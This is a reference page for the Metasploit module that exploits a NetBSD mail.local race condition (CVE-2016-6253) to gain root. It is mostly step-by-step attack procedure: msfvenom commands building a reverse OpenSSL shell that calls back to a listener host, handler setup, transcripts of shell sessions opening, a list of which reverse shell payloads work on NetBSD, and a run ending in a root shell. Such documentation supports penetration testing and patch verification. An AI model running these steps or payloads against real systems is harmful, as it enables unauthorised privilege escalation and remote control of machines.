NetBSD mail.local Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/unix/local/netbsd_mail_local metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: NetBSD mail.local Privilege Escalation
Module: exploit/unix/local/netbsd_mail_local
Source code: modules/exploits/unix/local/netbsd_mail_local.rb
Disclosure date: 2016-07-07
Last modification time: 2021-01-21 19:59:29 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2016-6253

This module attempts to exploit a race condition in mail.local with SUID bit set on: NetBSD 7.0 - 7.0.1 (verified on 7.0.1) NetBSD 6.1 - 6.1.5 NetBSD 6.0 - 6.0.6 Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.

Module Ranking and Traits

Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage

Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/unix/local/netbsd_mail_local
msf exploit(netbsd_mail_local) > show targets
    ... a list of targets ...
msf exploit(netbsd_mail_local) > set TARGET target-id
msf exploit(netbsd_mail_local) > show options
    ... show and set options ...
msf exploit(netbsd_mail_local) > set SESSION session-id
msf exploit(netbsd_mail_local) > exploit

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

NetBSD 7.0.1 is available from the official site, or on an unofficial git

Issues

Getting an initial shell that can write files correctly was difficult. The best I found was reverse_openssl.

Payloads that didn't work: * cmd/unix/reverse - connected back, but couldn't write file. [*] Started reverse TCP double handler on 172.16.152.1:4444 [*] Writing Payload to /tmp/zrWqhXpL [*] Max line length is 131073 [*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n" [*] printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n" [*] /usr/bin/printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n" [*] printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n" [*] perl -e 'print("\0\377\376\101\102\103\104\177\45\45\15\12")' Failed: "perl: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n" [*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: "gawk: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n" [*] echo '00fffe414243447f25250d0a'|xxd -p -r Failed: "xxd: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n" [*] echo -ne '\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a' Failed: "-ne \\x00\\xff\\xfe\\x41\\x42\\x43\\x44\\x7f\\x25\\x25\\x0d\\x0a\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n" [-] Exploit failed: RuntimeError Can't find command on the victim for writing binary data [*] Exploit completed, but no session was created. * cmd/unix/reverse_awk - awk: syntax error at source line 1 * cmd/unix/reverse_bash - ./bsd.payload: 1: Syntax error: Bad fd number * cmd/unix/reverse_bash_telnet_ssl - $ telnet: unknown option -- z * cmd/unix/reverse_ssl_double_telnet - $ telnet: unknown option -- z * cmd/unix/reverse_lua - lua: (command line):1: module 'socket' not found * netcat, node, perl, php, python, php, ruby, zsh - all not installed by default * bsd/* didn't seem to work either, maybe its for freebsd?

Payloads that did work: * cmd/unix/reverse_openssl

Verification Steps

  1. Start msfconsole
  2. Get an initial shell
    1. Create working shell, scp it over ./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload scp /tmp/bsd.payload [email protected]:/tmp/
    2. Setup msf to handle use exploit/multi/handler set payload cmd/unix/reverse_openssl set lhost 172.16.152.1 exploit
    3. Run the shell from NetBSD $ cd /tmp $ ls bsd.payload $ chmod +x bsd.payload $ ./bsd.payload $ WARNING: can't open config file: /etc/openssl/openssl.cnf depth=0 CN = vgekg verify error:num=18:self signed certificate verify return:1 depth=0 CN = vgekg verify return:1
    4. Receive the shell and background it [*] Started reverse double SSL handler on 172.16.152.1:4444 [*] Starting the payload handler... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo NwNHAEiJioYIvn4M; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "NwNHAEiJioYIvn4M\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400 ^Z Background session 1? [y/N] y
  3. Do: use exploit/unix/local/netbsd_mail_local
  4. Do: set payload cmd/unix/reverse_openssl
  5. Do: set lhost 172.16.152.1
  6. Do: set verbose true
  7. Do: set session 1
  8. Do: exploit
  9. You should get a root shell.

Options

ATRUNPATH File location of atrun, defaults to /usr/libexec/atrun

MAILDIR Location of mail folder, defaults to /var/mail

WritableDir Location of a writable directory for our payload, defaults to /tmp

ListenerTimeout Since this exploit utilized a cron which has a 10min timer, the listener timeout needs to be 10min + padding. Defaults to 603 seconds (10min, 3sec)

Scenarios

Here is a run against a virgin install of NetBSD 7.0.1 NetBSD 7.0.1 (GENERIC.201605221355Z) amd64 (from the unofficial link at the top)

In this example, I got lucky and only had to wait ~1min for the cron to hit, which is every 10min by default

  1. Get an initial shell
    1. Create working shell, scp it over ./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload scp /tmp/bsd.payload [email protected]:/tmp/
    2. Setup msf to handle use exploit/multi/handler set payload cmd/unix/reverse_openssl set lhost 172.16.152.1 exploit
    3. Run the shell from NetBSD $ cd /tmp $ ls bsd.payload $ chmod +x bsd.payload $ ./bsd.payload $ WARNING: can't open config file: /etc/openssl/openssl.cnf depth=0 CN = vgekg verify error:num=18:self signed certificate verify return:1 depth=0 CN = vgekg verify return:1
    4. Receive the shell and background it [*] Started reverse double SSL handler on 172.16.152.1:4444 [*] Starting the payload handler... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo NwNHAEiJioYIvn4M; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "NwNHAEiJioYIvn4M\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400 ^Z Background session 1? [y/N] y
  2. Run the exploit msf exploit(netbsd_mail_local) > set payload cmd/unix/reverse_openssl payload => cmd/unix/reverse_openssl msf exploit(netbsd_mail_local) > set lhost 172.16.152.1 lhost => 172.16.152.1 msf exploit(netbsd_mail_local) > set verbose true verbose => true msf exploit(netbsd_mail_local) > set session 1 session => 1 msf exploit(netbsd_mail_local) > exploit [*] Started reverse double SSL handler on 172.16.152.1:4444 [*] Writing Payload to /tmp/pjDkvmGg [*] Max line length is 131073 [*] Writing 176 bytes in 1 chunks of 618 bytes (octal-encoded), using printf [*] Writing exploit to /tmp/GHIKGOWX.c [*] Max line length is 131073 [*] Writing 4898 bytes in 1 chunks of 17162 bytes (octal-encoded), using printf [*] Compiling /tmp/GHIKGOWX.c via gcc [*] Starting the payload handler... [*] Executing at 2016-08-25 19:59:04 -0400. May take up to 10min for callback [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo X6C4UIDx4zmwM0DJ; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "X6C4UIDx4zmwM0DJ\n" [*] Matching... [*] B is input... [*] Command shell session 2 opened (172.16.152.1:4444 -> 172.16.152.128:65532) at 2016-08-25 20:00:02 -0400 [*] 2016-08-25 20:00:02 -0400 [*] Remember to run: chown root:wheel /usr/libexec/atrun [+] Deleted /tmp/pjDkvmGg [!] This exploit may require manual cleanup of '/tmp/pjDkvmGg' on the target [!] This exploit may require manual cleanup of '/tmp/GHIKGOWX' on the target [!] This exploit may require manual cleanup of '/tmp/GHIKGOWX.out' on the target 1633029467 TkBWZEPqsRvYvmwNaTcjImhcSzZHOAtY true JUqfyioWthnpvyxRJAZosSGQjnLHqPUB sHXbQbHqFIbnZGoFWlZoppGprWyKwFCr nDpSrEmQhDuVSxIpILWCOABbMOIAWUTx whoami root

Go back to menu.

Msfconsole Usage

Here is how the unix/local/netbsd_mail_local exploit module looks in the msfconsole:

msf6 > use exploit/unix/local/netbsd_mail_local

msf6 exploit(unix/local/netbsd_mail_local) > show info

       Name: NetBSD mail.local Privilege Escalation
     Module: exploit/unix/local/netbsd_mail_local
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-07-07

Provided by:
  h00die <[email protected]>
  akat1

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Check supported:
  No

Basic options:
  Name             Current Setting     Required  Description
  ----             ---------------     --------  -----------
  ATRUNPATH        /usr/libexec/atrun  yes       Location of atrun binary
  ListenerTimeout  603                 yes       Number of seconds to wait for the exploit
  MAILDIR          /var/mail           yes       Location of mailboxes
  SESSION                              yes       The session to run this module on.
  WritableDir      /tmp                yes       A directory where we can write files

Payload information:

Description:
  This module attempts to exploit a race condition in mail.local with 
  SUID bit set on: NetBSD 7.0 - 7.0.1 (verified on 7.0.1) NetBSD 6.1 - 
  6.1.5 NetBSD 6.0 - 6.0.6 Successful exploitation relies on a crontab 
  job with root privilege, which may take up to 10min to execute.

References:
  http://akat1.pl/?id=2
  https://www.exploit-db.com/exploits/40141
  https://nvd.nist.gov/vuln/detail/CVE-2016-6253
  http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc

Module Options

This is a complete list of options available in the unix/local/netbsd_mail_local exploit:

msf6 exploit(unix/local/netbsd_mail_local) > show options

Module options (exploit/unix/local/netbsd_mail_local):

   Name             Current Setting     Required  Description
   ----             ---------------     --------  -----------
   ATRUNPATH        /usr/libexec/atrun  yes       Location of atrun binary
   ListenerTimeout  603                 yes       Number of seconds to wait for the exploit
   MAILDIR          /var/mail           yes       Location of mailboxes
   SESSION                              yes       The session to run this module on.
   WritableDir      /tmp                yes       A directory where we can write files

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Advanced Options

Here is a complete list of advanced options supported by the unix/local/netbsd_mail_local exploit:

msf6 exploit(unix/local/netbsd_mail_local) > show advanced

Module advanced options (exploit/unix/local/netbsd_mail_local):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                603              no        Additional delay in seconds to wait for a session

Exploit Targets

Here is a list of targets (platforms and systems) which the unix/local/netbsd_mail_local module can exploit:

msf6 exploit(unix/local/netbsd_mail_local) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the unix/local/netbsd_mail_local exploit:

msf6 exploit(unix/local/netbsd_mail_local) > show payloads

Compatible Payloads
===================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  payload/cmd/unix/generic                           normal  No     Unix Command, Generic Command Execution
   1  payload/cmd/unix/reverse_openssl                   normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)

Evasion Options

Here is the full list of possible evasion options supported by the unix/local/netbsd_mail_local exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/local/netbsd_mail_local) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.